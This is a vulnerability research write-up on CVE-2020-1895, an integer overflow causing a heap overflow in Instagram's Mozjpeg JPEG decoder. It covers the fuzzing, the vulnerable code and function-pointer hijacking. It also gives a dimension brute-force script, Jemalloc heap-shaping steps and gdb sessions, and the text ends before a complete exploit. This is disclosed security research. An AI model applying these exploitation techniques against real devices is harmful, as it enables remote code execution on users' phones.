CATEGORIES

#Instagram_RCE: Code Execution Vulnerability in Instagram App for Android and iOS

September 24, 2020

Research by: Gal Elbaz

Background

Instagram, with over 100+ million photos uploaded every day, is one of the most popular social media platforms. For that reason, we decided to audit the security of the Instagram app for both Android and iOS operating systems. We found a critical vulnerability that can be used to perform remote code execution on a victim’s phone.

Our modus operandi for this research was to examine the 3rd party projects used by Instagram.

Many software developers, regardless of their size, utilize open-source projects in their software. We found a vulnerability in the way that Instagram utilizes Mozjpeg,  the open source project used as their JPEG format decoder.

In the attack scenario we describe below, an attacker simply sends an image to the victim via email, WhatsApp or other media exchange platforms. When the victim opens the Instagram app, the exploitation takes place.

Tell me who your friends are and I’ll tell you your vulnerabilities

We all know that even the biggest companies rely on public open-source projects and that those projects are integrated into their apps with little to no modifications.

Most companies using 3rd party open-source projects declare it, but not all libraries appear in the app’s About page. The best way to be sure you see all the libraries is to go to the lib-superpack-zstd folder of the Instagram app:

Figure 1. Shared objects used by Instagram.

In the image below, you can see that when you upload an image using Instagram, three shared objects are loaded: libfb_mozjpeg.so, libjpegutils_moz.so, and libcj_moz.so.

Figure 2. Mozjpeg’s shared objects.

The “moz” suffix is short for “mozjpeg,” which is short for Mozilla JPEG Encoder Project but what do these modules do?

What is Mozjpeg?

Let’s start with a brief history of the JPEG format. JPEG is an image file format that’s been around since the early 1990s, and is based on the concept of lossy compression, meaning that some information is lost in the compression process, but this information loss is negligible to the human eye. Libjpeg is the baseline JPEG encoder built into the Windows, Mac and Linux operating systems and is maintained by an informal independent group. This library tries to balance encoding speed and quality with file size.

In contrast, Libjpeg-turbo is a higher performance replacement for libjpeg, and is the default library for most Linux distributions. This library was designed to use less CPU time during encoding and decoding.

On March 5, 2014, Mozilla announced the “Mozjpeg” project, a JPEG encoder built on top of libjpeg-turbo, to provide better compression for web images, at the expense of performance.

 The open-source project is specifically for images on the web. Mozilla forked libjpeg-turbo in 2014 so they could focus on reducing file size to lower bandwidth and load web images more quickly.

Instagram decided to split the mozjpeg library into 3 different shared objects:

  • libfb_mozjpeg.so – Responsible for the Mozilla-specific decompression exported API.
  • libcj_moz.so – The libjeg-turbo that parses the image data.
  • libjpegutils_moz.so – The connector between the two shared objects. It holds the exported API that the JNI calls to trigger the decompression from the Java application side.

Fuzzing

Our team at CPR built a multi-processor fuzzing lab that gave us amazing results with our Adobe Research, so we decided to expand our fuzzing efforts to Mozjpeg as well.

As libjpeg-turbo was already heavily fuzzed, we focused on Mozjpeg.

The primary addition made by Mozilla on top of libjpeg-turbo was the compression algorithm, so that is where set our sights.

AFL was our weapon of choice, so naturally we had to write a harness for it.

To write the harness, we had to understand how to instrument the Mozjpeg decompression function.

Fortunately, Mozjpeg comes with a code sample explaining how to use the library:

METHODDEF(int)
do_read_JPEG_file(struct jpeg_decompress_struct *cinfo, char *filename)
{
  struct my_error_mgr jerr;
  /* More stuff */

  FILE *infile;                 /* source file */
  JSAMPARRAY buffer;            /* Output row buffer */
  int row_stride;               /* physical row width in output buffer */

  if ((infile = fopen(filename, "rb")) == NULL) {
    fprintf(stderr, "can't open %s\\n", filename);
    return 0;
  }

/* Step 1: allocate and initialize JPEG decompression object */
  /* We set up the normal JPEG error routines, then override error_exit. */

  cinfo->err = jpeg_std_error(&jerr.pub);
  jerr.pub.error_exit = my_error_exit;

  /* Establish the setjmp return context for my_error_exit to use. */
  if (setjmp(jerr.setjmp_buffer)) {
    jpeg_destroy_decompress(cinfo);
    fclose(infile);
    return 0;
  }

/* Now we can initialize the JPEG decompression object. */
  jpeg_create_decompress(cinfo);

  /* Step 2: specify data source (eg, a file) */
  jpeg_stdio_src(cinfo, infile);

  /* Step 3: read file parameters with jpeg_read_header() */
  (void)jpeg_read_header(cinfo, TRUE);

  /* Step 4: set parameters for decompression */
  /* In this example, we don't need to change any of the defaults set by
   * jpeg_read_header(), so we do nothing here.
   */
  /* Step 5: Start decompressor */
  (void)jpeg_start_decompress(cinfo);

  /* JSAMPLEs per row in output buffer */
  row_stride = cinfo->output_width * cinfo->output_components;

  /* Make a one-row-high sample array that will go away when done with image */
  buffer = (*cinfo->mem->alloc_sarray)
                ((j_common_ptr)cinfo, JPOOL_IMAGE, row_stride, 1);

  /* Step 6: while (scan lines remain to be read) */
  /*           jpeg_read_scanlines(...); */
  while (cinfo->output_scanline < cinfo->output_height) {
    (void)jpeg_read_scanlines(cinfo, buffer, 1);
    /* Assume put_scanline_someplace wants a pointer and sample count. */
    put_scanline_someplace(buffer[0], row_stride);
  }

  /* Step 7: Finish decompression */
  (void)jpeg_finish_decompress(cinfo);

  /* Step 8: Release JPEG decompression object */
  jpeg_destroy_decompress(cinfo);

  fclose(infile);
  return 1;
}

However, to make sure any crash we found in Mozjpeg impacts Instagram itself, we need to see how Instagram integrated Mozjpeg to their code.

Luckily, below you can see that Instagram copy-pasted the best practice for using the library:

                      Figure 3. Instagram’s implementation for using Mozjpeg.

As you can see, the only thing they really changed was to replace the put_scanline_someplace dummy function from the example code with read_jpg_copy_loop which utilizes memcpy.

Our harness receives generated image files from AFL and sends them to the wrapped Mozjpeg decompression function.

We ran the fuzzer for only a single day with 30 CPU cores, and AFL notified us about 447 unique “unique” crashes.

After triaging the results, we found an interesting crash related to the parsing of the image dimensions of JPEG. The crash was an out-of-bounds write and we decided to focus on it.

CVE-2020-1895

The vulnerable function is read_jpg_copy_loop which leads to an integer overflow during the decompression process. 

Figure 4. Read_jpg_copy_loop code snippet from IDA.

The vulnerable function handles the image dimensions when parsing JPEG image files. Here’s a pseudo code from the original vulnerable code:

width = rect->right - rect->bottom;
height = rect->top - rect->left;

allocated_address = __wrap_malloc(width*height*cinfo->output_components);// <---Integer overflow

bytes_copied = 0;

 while ( 1 ){
   output_scanline = cinfo->output_scanline;

   if ( (unsigned int)output_scanline >= cinfo->output_height )
      break;

    //reads one line from the file into the cinfo buffer
    jpeg_read_scanlines(cinfo, line_buffer, 1);

    if ( output_scanline >= Rect->left && output_scanline < Rect->top )
    {
        memcpy(allocated_address + bytes_copied , line_buffer, width*output_component);// <--Oops
        bytes_copied += width * output_component;
    }
 }

 

First, let’s understand what this code does.

The _wrap_malloc function allocates a memory chunk based on 3 parameters which are the image dimensions. Both width and height are 16 bit integers (uint16_t) that are parsed from the file.

cinfo->output_component tells us how many bytes represent each pixel. 

This variable can vary from 1 for Greyscale, 3 for RGB, and 4 for RGB + Alpha\CMYK\etc.

In addition to height and width, the output_component is also completely controlled by the attacker. It is parsed from the file and is not validated with regards to the remaining data available in the file.

__warp_malloc expects its parameters to be passed in 32bit registers! That means if we can cause the allocation size to exceed (2^32) bytes, we have an integer overflow that leads to a much smaller allocation than expected.

The allocated size is calculated by multiplying the image’s width, height and output_components. Those sizes are unchecked and in our control. When abused, they lead to an integer overflow.

__wrap_malloc(width * height * cinfo->output_components);// <---- Integer overflow

Conveniently enough, this buffer is then passed to memcpy, leading to a heap-based buffer overflow.

After the allocation, the memcpy function is called and copies the image data to the allocated memory.

The copying is conducted line by line. 

memcpy(allocated_address + bytes_copied ,line_buffer, width*output_component);//<--Oops

A data of size (width*output_component) is copied (height) times.

It’s a promising-looking bug from an exploitation perspective: a linear heap-overflow gives the attacker control over the size of the allocation, the amount of overflow, and the contents of the overflowed memory region.

Wild Copy Exploitation

To cause the memory corruption, we need to overflow the integer determining the allocation size; our calculation must exceed 32 bits. We are dealing with a wildcopy which means we are trying to copy data that is larger than 2^32 (4GB). Therefore, there is an extremely high probability the program will crash when the loop reaches an unmapped page:

  Figure 5. Segfault caused by our wildcopy.

So how can we exploit this?

Before we dive into wildcopy exploitation techniques, we need to differentiate our case from the classic case of wildcopy like in the Stagefright bug. The classic case usually involves one memcpy that writes 4GB of data. 

However, in our case there is a for loop that tries to copy X bytes Y times while X * Y is 4GB. 

When we try to exploit such a memory corruption vulnerability, we need to ask ourselves a few important questions:

  • Can we control (even partially) the content of the data we are corrupting with?
  • Can we control the length of the data we are corrupting with?
  • Can we control the size of the allocated chunk we overflow?

This last question is especially important because in Jemalloc/LFH (or every bucket-based allocator), if we can’t control the size of the chunk we are corrupting from, it might be difficult to shape the heap such that we could corrupt a specific target structure, if that structure is in a significantly different size.

At first glance, it seems clear that the answer to the first question, about our ability to control the content, is “yes”, because we control the content of the image data.

Now, moving on to the second question – controlling the length of the data we corrupt with. The answer here is also clearly “yes” because the memcpy loop copies the file line by line and the size of each line copied is a multiplication of the width argument and output_component that are controlled by the attacker.

 The answer to the 3rd question, about the size of the buffer we corrupt, is trivial. 

As it is controlled by `width * height * cinfo->output_components`, we wrote a small Python script that gives us what these 3 parameters should be, according to the chunk size we wish to allocate, considering the effect of the integer overflow:

import sys

def main(low=None, high=None):
    res = []
    print("brute forcing...")

    for a in range(0xffff):
        for b in range(0xffff):
             x = 4 * (a+1) * (b+1) - 2**32
             if 0 < x <= 0x100000:#our limit
                 if (not low or (x > low)) and (not high or x <= high):
        res.append((x, a+1, b+1)) 

    for s, x, y in sorted(res, key=lambda i: i[0]):
         print "0x%06x, 0x%08x, 0x%08x" % (s, x, y)

if __name__ == '__main__':

    high = None
    low = None 

    if len(sys.argv) == 2:
        high = int(sys.argv[1], 16)

    elif len(sys.argv) == 3:
         high = int(sys.argv[2], 16)
         low = int(sys.argv[1], 16) 

    main(low, high)

 

Now that we have our prerequisites for exploiting a wildcopy, let’s see how we can utilize them.

To trigger the vulnerability, we must specify a size larger than 2^32 bytes. In practice, we need to stop the wildcopy before we reach the unmapped memory.

We have a number of options:

  • Rely on a race condition – While the wildcopy corrupts some useful target structures or memory, we can race a different thread to use that now corrupted data to do something before the wildcopy crashes (e.g., construct other primitives, terminate the wildcopy, etc.).
  • If the wildcopy loop has some logic that can stop the loop under certain conditions, we can mess with these checks and stop after it corrupts enough data. 
  • If the wildcopy loop has a call to a virtual function on every iteration, and that pointer to a function is in a structure in heap memory (or at another memory address we can corrupt during the wildcopy), the exploit can use the loop to overwrite and divert execution during the wildcopy.

Sadly, the first option isn’t applicable here because we are attacking from an image vector. Therefore, we don’t have any control over threads so the race condition option does not help. 

To use the second approach, we looked for a kill-switch to stop the wildcopy. We tried cutting the file in half while keeping the same size in the image header. However, we found out that if the library reaches an EOF marker, it just adds another EOF marker, so we end up in an infinite loop of EOF markers. 

We also tried looking for an ERREXIT function that could stop the decompression process at runtime, but we learned that no matter what we do, we can never reach a path that leads to ERREXIT in this code. Therefore, the second option isn’t applicable either.

To use the third option, we need to look for a virtual function that gets called on every iteration of our wildcopy loop.

Let’s go back to the loop logic where the memcpy copy occurs:

while ( 1 ){

   output_scanline = cinfo->output_scanline;

   if ( (unsigned int)output_scanline >= cinfo->output_height )
      break;

    jpeg_read_scanlines(cinfo, line_buffer, 1);
    if ( output_scanline >= Rect->left && output_scanline < Rect->top )
    {
        memcpy(allocated_address + bytes_copied , line_buffer, width*output_component)
        bytes_copied += width * output_component;
    }
 }

We can see that we have only one function that gets called on every iteration besides our overriding memcpy… jpeg_read_scanlines to the rescue!

Let’s examine the jpeg_read_scanlines code:

GLOBAL(JDIMENSION)

jpeg_read_scanlines(j_decompress_ptr cinfo, JSAMPARRAY scanlines,
                    JDIMENSION max_lines)
{

  JDIMENSION row_ctr;

  if (cinfo->global_state != DSTATE_SCANNING)
    ERREXIT1(cinfo, JERR_BAD_STATE, cinfo->global_state);

  if (cinfo->output_scanline >= cinfo->output_height) {
    WARNMS(cinfo, JWRN_TOO_MUCH_DATA);
    return 0;
  }

  /* Call progress monitor hook if present */
  if (cinfo->progress != NULL) {
    cinfo->progress->pass_counter = (long)cinfo->output_scanline;
    cinfo->progress->pass_limit = (long)cinfo->output_height;
    (*cinfo->progress->progress_monitor) ((j_common_ptr)cinfo);
  }

  /* Process some data */
  row_ctr = 0;
  (*cinfo->main->process_data) (cinfo, scanlines, &row_ctr, max_lines);
  cinfo->output_scanline += row_ctr;
  return row_ctr;
}

As you can see, we have a call to a virtual function process_data each time that jpeg_read_scanlines gets called to read another line from the file.

The line being read from the file is copied to a buffer called `row_ctr` inside a struct called cinfo.

(*cinfo->main->process_data) (cinfo, scanlines, &row_ctr, max_lines);

proccess_data points to another function called process_data_simple_main:

process_data_simple_main(j_decompress_ptr cinfo, JSAMPARRAY output_buf,
                         JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
{
  my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
  JDIMENSION rowgroups_avail;
  /* Read input data if we haven't filled the main buffer yet */
  if (!main_ptr->buffer_full) {
    if (!(*cinfo->coef->decompress_data) (cinfo, main_ptr->buffer))
      return;                   
    main_ptr->buffer_full = TRUE;      
  }
  rowgroups_avail = (JDIMENSION)cinfo->_min_DCT_scaled_size;
  /* Feed the postprocessor */
  (*cinfo->post->post_process_data) (cinfo, main_ptr->buffer,
                                     &main_ptr->rowgroup_ctr, rowgroups_avail,
                                     output_buf, out_row_ctr, out_rows_avail);
 
  /* Has postprocessor consumed all the data yet? If so, mark buffer empty */
  if (main_ptr->rowgroup_ctr >= rowgroups_avail) {
    main_ptr->buffer_full = FALSE;
    main_ptr->rowgroup_ctr = 0;
  }
}

From process_data_simple_main, we can identify 2 more virtual functions that get called in every iteration. They all have a cinfo struct as a common denominator.

What is this cinfo?

Cinfo is a struct that is passed around during the Mozjpeg various functionality. It holds crucial members, function pointers and image meta-data.

Let’s look at cinfo struct from Jpeglib.h

struct jpeg_decompress_struct { 
            struct jpeg_error_mgr *err;   
   	    struct jpeg_memory_mgr *mem;  
	    struct jpeg_progress_mgr *progress; 
	    void *client_data;            
	    boolean is_decompressor;     
	    int global_state 
            struct jpeg_source_mgr *src;
    	    JDIMENSION image_width;
    	    JDIMENSION image_height;
    	    int num_components;
    	    ...
	    J_COLOR_SPACE out_color_space;
	   unsigned int scale_num
	   ...
	   JDIMENSION output_width;      
	   JDIMENSION output_height;     
	   int out_color_components;     
	   int output_components;        
	   int rec_outbuf_height;
	   int actual_number_of_colors;  
	   ...
	   boolean saw_JFIF_marker;      
	   UINT8 JFIF_major_version;    
	   UINT8 JFIF_minor_version;
	   UINT8 density_unit;           
	   UINT16 X_density;             
	   UINT16 Y_density;             
	   ...    
	   ...
	   int unread_marker;
   	   struct jpeg_decomp_master *master;    
	   struct jpeg_d_main_controller *main;  <<-- there’s a function pointer here
	   struct jpeg_d_coef_controller *coef; <<-- there’s a function pointer here
	   struct jpeg_d_post_controller *post; <<-- there’s a function pointer here
	   struct jpeg_input_controller *inputctl; 
	   struct jpeg_marker_reader *marker;
	   struct jpeg_entropy_decoder *entropy;
	   . . .
	   struct jpeg_upsampler *upsample;
	   struct jpeg_color_deconverter *cconvert
	    . . .
};

In the cinfo struct, we can see 3 pointers to functions that we can try to overwrite during the overwrite loop and divert the execution flow.

It turns out that the third option is applicable in our case!

Jemalloc 101

Before we dive into the Jemalloc exploitation concepts, we need to understand how Android’s heap allocator works, as well as all of the terms that we focus on in the next chapter – Chunks, Runs, Regions.

Jemalloc is a bucket-based allocator that divides memory into chunks, always of the same size, and uses these chunks to store all of its other data structures (and user-requested memory as well). Chunks are further divided into ‘runs’ that are responsible for requests/allocations up to certain sizes. A run keeps track of free and used ‘regions’ of these sizes. Regions are the heap items returned on user allocations (malloc calls). Finally, each run is associated with a ‘bin.’ Bins are responsible for storing structures (trees) of free regions.

Figure 6. Jemalloc basic design.

Controlling the PC register

We found 3 good function pointers that we can use to divert execution during the wildcopy and control the PC register.

The cinfo struct has these members:

  • struct jpeg_d_post_controller *post
  • struct jpeg_d_main_controller *main
  • struct jpeg_d_coef_controller *coef

These 3 structs are defined in Jpegint.h

/* Main buffer control (downsampled-data buffer) */
struct jpeg_d_main_controller {
  void (*start_pass) (j_decompress_ptr cinfo, J_BUF_MODE pass_mode);
  void (*process_data) (j_decompress_ptr cinfo, JSAMPARRAY output_buf,
                        JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail);
};
 
/* Coefficient buffer control */
struct jpeg_d_coef_controller {
  void (*start_input_pass) (j_decompress_ptr cinfo);
  int (*consume_data) (j_decompress_ptr cinfo);
  void (*start_output_pass) (j_decompress_ptr cinfo);
  int (*decompress_data) (j_decompress_ptr cinfo, JSAMPIMAGE output_buf);
  jvirt_barray_ptr *coef_arrays;
};
 
/* Decompression postprocessing (color quantization buffer control) */
struct jpeg_d_post_controller {
  void (*start_pass) (j_decompress_ptr cinfo, J_BUF_MODE pass_mode);
  void (*post_process_data) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
                             JDIMENSION *in_row_group_ctr,
                             JDIMENSION in_row_groups_avail,
                             JSAMPARRAY output_buf, JDIMENSION *out_row_ctr,
                             JDIMENSION out_rows_avail);

We need to find where the 3 structures are located in the heap memory, so we can override at least one of them to gain control of the PC register.

To figure that out, we need to know what the heap looks like when we decompress an image using Mozjpeg.

Mozjpeg’s internal memory manager

Let’s recall one of cinfo’s most important struct members:

 

struct jpeg_memory_mgr *mem;  /* Memory manager module */ 

Mozjpeg has its own memory manager. The JPEG library’s memory manager controls allocating and freeing memory, and it manages large “virtual” data arrays. All memory and temporary file allocation within the library is done via the memory manager. This approach helps prevent storage-leak bugs, and it speeds up operations whenever malloc/free are slow.

The memory manager creates “pools” of free storage, and a whole pool can be freed at once.

Some data is allocated “permanently” and is not freed until the JPEG object is destroyed.

Most of the data is allocated “per image” and is freed by jpeg_finish_decompress or jpeg_abort functions.

For example, let’s look at one of the allocations that Mozjpeg did as part of the image decoding process. When Mozjpeg asks to allocate 0x108 bytes, in reality malloc is called with the size 0x777. As you can see, the requested size and the actual size allocated are different. 

Let’s analyze this behavior. 

Mozjpeg uses wrapper functions for small and big allocations alloc_small and alloc_large

METHODDEF(void *)
alloc_small(j_common_ptr cinfo, int pool_id, size_t sizeofobject){
...
...
hdr_ptr = (small_pool_ptr)jpeg_get_small(cinfo, min_request + slop);
slop = first_pool_slop[1] == 16000
min_request = sizeof(small_pool_hdr) + sizeofobject + ALIGN_SIZE - 1;
   
sizeofobject == round_up_pow2(0x120, ALIGN_SIZE) == 0x120
ALIGN_SIZE   == 16
sizeof(small_pool_hdr) = 0x20

static const size_t first_pool_slop[JPOOL_NUMPOOLS] = {
                    1600,                    /* first PERMANENT pool */
                    16000                    /* first IMAGE pool */
                                                      };

When calling jpeg_get_small, it is basically calling malloc.

GLOBAL(void *)
jpeg_get_small(j_common_ptr cinfo, size_t sizeofobject)
{
  return (void *)malloc(sizeofobject);
}

The allocated “pools” are managed by alloc_small and the other wrapper functions which maintain a set of members that help them monitor the state of the “pools.” Therefore, whenever there is an allocation request, the wrapper functions check if there is enough space left in the “pool.”

If there is space available, the alloc_small function returns an address from the current “pool” and advances the pointer that points to the free space.

When the “pool” runs out of space, it allocates another “pool” using predefined sizes that it reads from the first_pool_slop array, which in our case are 1600 and 16000.

static const size_t first_pool_slop[JPOOL_NUMPOOLS] = {
                    1600,                    /* first PERMANENT pool */
                    16000                    /* first IMAGE pool */
                                                      };

Now that we understand how Mozjpeg’s memory manager works, we need to figure out which “pool” of memory holds our targeted virtual function pointers.

As part of the decompression process, there are two major functions that decode the image metadata and prepare the environment for later processing. The two major functions jpeg_read_header and jpeg_start_decompress are the only functions that allocate memory until we reach our wild copy loop.

jpeg_read_header parses the different markers from the file. 

While parsing those markers, the second and largest “pool” of size 16000 (0x3e80) gets allocated by the Mozjpeg memory manager. The sizes of the “pools” are const values from the first_pool_slop array (from the code snippet above), which means that the Mozjpeg’s internal allocator already used all of the space of the first pool. 

We know that our targeted main, coef and post structures get allocated from within the jpeg_start_decompress function. We can therefore safely assume that the rest of the allocations (until we reach our wildcopy loop) will end up being in the second big “pool” including the main, coef and post structures that we want to override!

Now let’s have a closer look on how Jemalloc deals with this type of size class allocation. 

Using Shadow to put some light

Allocations returned by Jemalloc are divided into three size classes- small, large, and huge.

  • Small/medium: These regions are smaller than the page size (typically 4KB).
  • Large: These regions are between small/medium and huge (between page size to chunk size).
  • Huge: These are bigger than the chunk size. They are dealt with separately and not managed by arenas; they have a global allocator tree.

Memory returned by the OS is divided into chunks, the highest abstraction used in Jemalloc’s design. In Android, those chunks have different sizes for different versions. They are usually around 2MB/4MB. Each chunk is associated with an arena.

A run can be used to host either one large allocation or multiple small allocations.

Large regions have their own runs, i.e. each large allocation has a dedicated run.

We know that our targeted “pool” size is (0x3e80=16,000 DEC) which is bigger than page size (4K) and smaller than Android chunk size. Therefore, Jemalloc allocates a large run of size (0x5000) each time! 

Let’s take a closer look.

(gdb)info registers X0
X0		0x3fc7
(gdb)bt
#0  0x0000007e6a0cbd44 in malloc () from target:/system/lib64/libc.so
#1  0x0000007e488b3e3c in alloc_small () from target:/data/data/com.instagram.android/lib-superpack-zstd/libfb_mozjpeg.so
#2  0x0000007e488ab1e8 in get_sof () from target:/data/data/com.instagram.android/lib-superpack-zstd/libfb_mozjpeg.so
#3  0x0000007e488aa9b8 in read_markers () from target:/data/data/com.instagram.android/lib-superpack-zstd/libfb_mozjpeg.so
#4  0x0000007e488a92bc in consume_markers () from target:/data/data/com.instagram.android/lib-superpack-zstd/libfb_mozjpeg.so
#5  0x0000007e488a354c in jpeg_consume_input () from target:/data/data/com.instagram.android/lib-superpack-zstd/libfb_mozjpeg.so
#6  0x0000007e488a349c in jpeg_read_header () from target:/data/data/com.instagram.android/lib-superpack-zstd/libfb_mozjpeg.so

We can see that the actual allocated values sent to malloc are indeed (0x3fc7). This matches the large “pool” size of 16000 (0x3e80) plus the sizes of Mozjpeg’s large_pool_hdr, and the actual size of the object that was supposed to be allocated and ALIGN_SIZE(16/32) – 1.

One thing which can really make a huge difference when implementing heap shaping for an exploit is having a way to visualize the heap: to see the various allocations in the context of the heap.

For this we use a simple tool which allows us to inspect the heap state for a target process during exploit development. We used a tool called “shadow” that argp and vats wrote for visualizing the Jemalloc heap.

We performed a debugging session using shadow over gdb to verify our assumptions regarding the large run that we wish to override.

Cinfo:
(gdb) x/164xw 0x729f4f8b98
0x729f4f8b98:	0x9f4f89f0	0x00000072	0xbdfe3040	0x00000072
0x729f4f8ba8:	0x00000000	0x00000000	0x00000014	0x000002a8
0x729f4f8bb8:	0x00000001	0x000000cd	0xbdef79f0	0x00000072
0x729f4f8bc8:	0x00006a44	0x00009a2e	0x00000003	0x00000003
0x729f4f8bd8:	0x0000000c	0x00000001	0x00000001	0x00000000
0x729f4f8be8:	0x00000000	0x3ff00000	0x00000000	0x00000000
0x729f4f8bf8:	0x00000000	0x00000001	0x00000001	0x00000000
0x729f4f8c08:	0x00000002	0x00000001	0x00000100	0x00000000
0x729f4f8c18:	0x00000000	0x00000000	0x00006a44	0x00009a2e
0x729f4f8c28:	0x00000004	0x00000004	0x00000001	0x00000000
0x729f4f8c38:	0x00000000	0x00000000	0x00000000	0x00000001
0x729f4f8c48:	0x00000000	0x00000001	0x00000000	0x00000000
0x729f4f8c58:	0x00000000	0x00000000	0xbdef7a40	0x00000072
0x729f4f8c68:	0xbdef7ad0	0x00000072	0x00000000	0x00000000
0x729f4f8c78:	0x00000000	0x00000000	0xbdef7b60	0x00000072
0x729f4f8c88:	0xbdef7da0	0x00000072	0x00000000	0x00000000
0x729f4f8c98:	0x00000000	0x00000000	0xbdef7c80	0x00000072
0x729f4f8ca8:	0x9f111ca0	0x00000072	0x00000000	0x00000000
0x729f4f8cb8:	0x00000000	0x00000000	0x00000008	0x00000000
0x729f4f8cc8:	0xa63e9be0	0x00000072	0x00000000	0x00000000
0x729f4f8cd8:	0x00000000	0x00000000	0x00000000	0x00000000
0x729f4f8ce8:	0x00000000	0x01010101	0x01010101	0x01010101
0x729f4f8cf8:	0x01010101	0x05050505	0x05050505	0x05050505
0x729f4f8d08:	0x05050505	0x00000000	0x00000000	0x00000101
0x729f4f8d18:	0x00010001	0x00000000	0x00000000	0x00000000
0x729f4f8d28:	0x00000000	0x00000000	0x00000002	0x00000002
0x729f4f8d38:	0x00000008	0x00000008	0x000009a3	0x00000000
0x729f4f8d48:	0xa63e9e00	0x00000072	0x00000003	0x00000000
0x729f4f8d58:	0xa63e9be0	0x00000072	0xa63e9c40	0x00000072
0x729f4f8d68:	0xa63e9ca0	0x00000072	0x00000000	0x00000000
0x729f4f8d78:	0x000006a5	0x000009a3	0x00000006	0x00000000
0x729f4f8d88:	0x00000000	0x00000000	0x00000000	0x00000001
0x729f4f8d98:	0x00000002	0x00000000	0x00000000	0x00000000
0x729f4f8da8:	0x00000000	0x00000000	0x0000003f	0x00000000
0x729f4f8db8:	0x00000000	0x00000008	0xa285d500	0x00000072
0x729f4f8dc8:	0x0000003f	0x00000000	0xbdef7960	0x00000072
0x729f4f8dd8:	0xa63eaa70	0x00000072  <========= main
	                        0xa63ea900	0x00000072  <========= post
0x729f4f8de8:	0xa63ea3e0	0x00000072  <========= coef
	0xbdef7930	0x00000072
0x729f4f8df8:	0xbdef7820	0x00000072	0xa63ea790	0x00000072
0x729f4f8e08:	0xa63ea410	0x00000072	0xa63ea2c0	0x00000072
0x729f4f8e18:	0xa63ea280	0x00000072	0x00000000	0x00000000
 
(gdb) jeinfo 0x72a63eaa70  <========= main
parent    address         size    
--------------------------------------
arena     0x72c808fc00    -       
chunk     0x72a6200000    0x200000
run       0x72a63e9000    0x5000  <========= our large targeted run!

Heap-shaping strategy

Our goal is to exploit an integer overflow that leads to a heap buffer overflow.

Exploiting these kinds of bugs is all about precise positioning of heap objects. We want to force certain objects to be allocated in specific locations in the heap, so we can form useful adjacencies for memory corruption.

To achieve this adjacency, we need to shape the heap so our exploitable object is allocated just before our targeted object.

Unfortunately, we have no control over free operations. According to Mozjpeg documentation, most of the data is allocated “per image” and is freed by jpeg_finish_decompress, or jpeg_abort.” This means that all of the free operations occur at the end of the decompression process using jpeg_finish_decompress, or jpeg_abort which is only called after we have finished overriding memory with our wildcopy loop.

However, in our case we don’t need any free operations because we have control over a function which performs a raw malloc with a size that we control. This gives us the power to choose where we want to place our overflowed buffer on the heap.

We want to position the object containing our overflowed buffer just before the large (0x5000) object containing the main/post/coef data structures that performs a call to function pointers.

Figure 7. Visualizing Jemalloc objects on the heap.  

Therefore, the simplest way for us to exploit this is to shape the heap so that the overflowed buffer is allocated right before our targeted large (0x5000) object, and then (use the bug to) overwrite the main/post/coef virtual functions address to our own. This gives us full control of the virtual table that redirects any method to any code address.

We know that the targeted object is always at the same (0x5000) large size, and because Jemalloc allocates large sizes from top to bottom, the only thing we need is to place our overflow objects in the bottom of the same chunk where the large target object is located.

Jemalloc’s chunk size is 2MB in our tested Android version.

The distance (in bytes) between the objects doesn’t matter because we have a wildcopy loop that can copy enormous amounts of data line by line (we control the size of the line). The data that is copied is ultimately larger than 2MB, so we know for sure that we will end up corrupting every object on the chunk that is located after our overflow object.

As we don’t have any control over free operations, we cannot create holes that our object will fall to. (A hole is one or more free places in a run.) Instead, we tried looking for holes that happen anyways as part of the image decompression flow, looking for sizes that repeat every time during debugging.

Let’s use the shadow tool to examine our chunk’s layout in memory:

(gdb) jechunk 0x72a6200000
This chunk belongs to the arena at 0x72c808fc00.

addr            info                  size       usage  
------------------------------------------------------------
0x72a6200000    headers               0xd000     -      
0x72a620d000    large run             0x1b000    -            
0x72a6227000    large run             0x1b000    -      
0x72a6228000    small run (0x180)     0x3000     10/32  
0x72a622b000    small run (0x200)     0x1000     8/8    
...
...
0x72a638f000    small run (0x80)      0x1000     6/32   
0x72a6390000    small run (0x60)      0x3000     12/128 
0x72a6393000    small run (0xc00)     0x3000     4/4    
0x72a6396000    small run (0xc00)     0x3000     4/4    
0x72a6399000    small run (0x200)     0x1000     2/8    
0x72a639a000    small run (0xe0)      0x7000     6/128  <===== The run we want to hit!!!
0x72a63a1000    small run (0x1000)    0x1000     1/1    
0x72a63a2000    small run (0x1000)    0x1000     1/1    
0x72a63a3000    small run (0x1000)    0x1000     1/1    
0x72a63a4000    small run (0x1000)    0x1000     1/1    
0x72a63a5000    large run    0x5000        -         <===== Large targeted object!!! 

We are looking for runs with holes, and those runs must be before the large targeted buffer we want to override. A run can be used to host either one large allocation, or multiple small/medium allocations. 

Runs that host small allocations are divided into regions. A region is synonymous to a small allocation. Each small run hosts regions of just one size. In other words, a small run is associated with exactly one region size class.

Runs that host medium allocations are also divided into regions, but as the name indicates, they are bigger than the small allocations. Therefore, the runs that host medium allocations are divided into bigger size class regions that take up more space.

For example, a small run of size class 0xe0 is divided into 128 regions:

0x72a639a000    small run (0xe0)      0x7000     6/128  

Medium runs of size class 0x200 are divided into 8 regions: 

0x72a6399000    small run (0x200)     0x1000     2/8

Small allocations are the most common allocations, and most likely the ones you need to manipulate/control/overflow. As small allocations are divided into more regions, they are easier to control as it is less likely that other threads will allocate all of the remaining regions.

Therefore, to cause the overflowable object to be allocated before the large targeted object, we use our Python script from (Wild Copy Exploitation paragraph). The script helps us generate the dimensions that will cause the malloc to allocate our overflowable object in our targeted small size class.

We constructed a new JPEG image with the sizes to trigger allocation to the small size class of (0xe0) objects and set a breakpoint on libjepgutils_moz.so+0x918.

(gdb) x/20i $pc
=> 0x7e47ead7dc:	bl	0x7e47eae660 <__wrap_malloc@plt>
   0x7e47ead7e0:	mov	x23, x0

We are at the point of one command before our controlled malloc, and X0 holds the size that we wish to allocate:

(gdb) info registers x0
x0             0xe0		224

We continue one command forward and again examine the X0 register which now holds the result that we got from the calling the malloc:

(gdb) x/20i $pc
=> 0x7e4cf987e0:	mov	x23, x0
 
(gdb) info registers x0
x0             0x72a639ac40	492415069248

The address we got back from malloc is the address of our overflowable object (0x72a639ac40). Let’s examine its location on the heap using the jeinfo method from the shadow framework.

(gdb) jeinfo 0x72a639ac40
parent    address         size    
--------------------------------------
arena     0x72c808fc00    -       
chunk     0x72a6200000    0x200000
run       0x72a639a000    0x7000  
region    0x72a639ac40    0xe0

